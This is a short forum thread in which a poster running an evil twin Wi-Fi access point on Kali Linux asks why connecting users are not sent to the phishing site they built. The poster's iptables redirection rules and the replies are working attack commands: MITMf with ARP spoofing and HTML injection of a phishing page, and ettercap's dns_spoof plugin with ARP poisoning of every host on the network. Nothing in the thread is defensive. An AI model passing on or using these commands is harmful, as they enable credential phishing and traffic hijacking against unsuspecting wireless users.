Forum Thread: How Do I Redirect Traffic to Phishing Site on Evil Twin

I have been practising how to do the evil twin attack and everything has been going the way its supposed to except the fact that when a user connects to my evil twin they are not redirected to the phishing site that I have created.

I running kali linux as my primary os and I put the phishing site in /var/www/.
I have used iptables to redirect the traffic but it still isn't redirecting.
The code I typed for redirecting is:
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination <my Ip Address>:80
iptables -t nat -A POSTROUTING -j MASQUERADE

If anyone knows the issue your help will be much appreciated.

3 Responses

use MITMF
example: mitmf -i wlan0 --gateway 192.168.1.1 --arp --spoof --inject --html-url http://192.168.1.100/index.html

OR: ettercap dns_spoof (edit /etc/ettercap/etter.dns first)

Is dnsspoof on 2016.2? Cuz I can't find it

dns_spoof is not a standalone tool. it's a plugin in ettercap. you can load it as follows:

ettercap -T -Q -i wlan0 -P dns_spoof -M arp // //

Share Your Thoughts

  • Hot
  • Active